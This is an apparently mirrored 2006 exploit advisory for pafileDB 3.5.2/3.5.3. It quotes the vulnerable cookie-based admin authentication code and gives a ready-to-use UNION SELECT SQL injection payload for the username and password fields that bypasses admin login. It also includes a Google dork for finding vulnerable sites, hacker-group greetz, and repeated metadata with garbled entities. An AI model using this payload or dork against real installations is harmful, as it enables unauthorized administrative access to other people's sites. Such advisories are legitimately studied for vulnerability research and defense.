PafileDB Login SQL injection =)

2006-12-0900:00:00

vulners.com

JSON

PafileDB Login SQL injection =)

author : koray & [email protected]

Risk : High

Class : Remote

Vulnerable Script : pafileDB

Version : 3.5.2 / 3.5.3

google : powered by pafiledb 3.5.3/2

greetz : www.cigicigi.net & redhackers

Vulnerable;
include/admin/auth.php

c0de ;
if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this:

$admininfo = array&#40;&#41;;
if &#40;checkpass&#40;$_COOKIE[&#39;pafiledb_user&#39;], $_COOKIE[&#39;pafiledb_pass&#39;], $admininfo&#41;&#41; {
    //checkpass&#40;&#41; returned true, so the user exists
    
    //$adminloggedin is a var used throughout the script to see if someone&#39;s logged in.
    $adminloggedin = true;
    $smarty-&gt;assign&#40;&#39;admininfo&#39;, $admininfo[0]&#41;;
    
} else { //The cookie exists, but the user/pass don&#39;t match

…

username : 1%20union%20select%%20201,2,3,4/*
password : 1%20union%20select%%20201,2,3,4/* /

pafile/pafiledb.php?action=admin logged…

JSON

PafileDB Login SQL injection =&#41;

PafileDB Login SQL injection =)

author : koray & [email protected]

Risk : High

Class : Remote

Vulnerable Script : pafileDB

Version : 3.5.2 / 3.5.3

google : powered by pafiledb 3.5.3/2

greetz : www.cigicigi.net & redhackers

PafileDB Login SQL injection =)